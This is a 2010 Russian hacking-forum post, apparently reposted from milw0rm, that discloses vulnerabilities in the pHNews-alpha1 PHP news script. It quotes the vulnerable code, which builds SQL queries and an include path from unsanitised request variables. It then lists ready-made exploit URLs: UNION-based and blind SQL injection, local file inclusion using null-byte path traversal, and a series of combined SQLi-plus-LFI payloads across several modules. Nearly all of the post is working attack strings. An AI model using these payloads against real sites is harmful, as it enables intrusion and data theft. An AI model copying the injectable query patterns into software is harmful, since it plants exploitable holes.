11.03.2010, 13:26
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832
Репутация:
1588
|
|
pHNews
product : pHNews-alpha1-normal
SQL injection
modules/comments.php - code
PHP код:
if ($ii >= $messagespp) {
// Find out how many pages
$pages = $ii / $messagespp;
$pages = ceil($pages);
$pages++;
$page++;
$pagesm = $pages - 1;
$comm_output .= pages($pagesm,"?mod=comments&id=".$_GET['id']."&page=");
}
unset($tmp_ended);
$sql = "SELECT lastread FROM Users WHERE UName = '$user_uname'";
$result = mysql_query($sql) or die('Query failed: ' . mysql_error());
$row = mysql_fetch_array($result, MYSQL_ASSOC);
$exploaded = $pHNews->explodeAssoc("&", $row['lastread']);
$exploaded[$_GET['id']] = time();
$sql = "UPDATE Users SET lastread='".$pHNews->implodeAssoc("&", $exploaded)."' WHERE UName = '$user_uname';";
mysql_query($sql);
$mod_output .= mysql_error();
result
mq=off
SQL Injection
Код:
http://localhost/upload/indexfix.php?mod=comments&id=1'+and+0+union+all+select+1,version(),3,4,5,6,7,8--+
Blind SQL Injection
Код:
http://localhost/upload/indexfix.php?mod=comments&user_uname=[blind sql]
modules/view_profile.php
PHP код:
//$sql = "SELECT * FROM `Users` WHERE `UName`='{$_GET['user']}'";
//$result = mysql_query($sql) or die('Query failed: ' . mysql_error());
//$row = mysql_fetch_array($result);
$row = $pHNews->get_user_info("", $_GET['user']);
result :
Код:
http://localhost/upload/indexfix.php?mod=view_profile&user='+and+0+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--+
Local File Inclusion
module/comments.php - code
PHP код:
include "./$templates_dir/$template/comments.php";
mq=off
result :
Код:
http://localhost/upload/modules/comments.php?templates_dir=../../upload/[file]%00
Код:
http://localhost/upload/modules/comments.php?template=../../upload/[file]%00
(с) milw0rm
SQL injection + Local File Inclusion
mq=off
rg=on
Код:
http://localhost/upload/indexfix.php?mod=view_profile'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=login'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=usercp'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=admin'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=register'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=news'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=about'+and+0+union+all+select+[LFI],2--+
http://localhost/upload/indexfix.php?mod=terms'+and+0+union+all+select+[LFI],2--+
Последний раз редактировалось [x60]unu; 11.03.2010 в 13:48..
|
|
|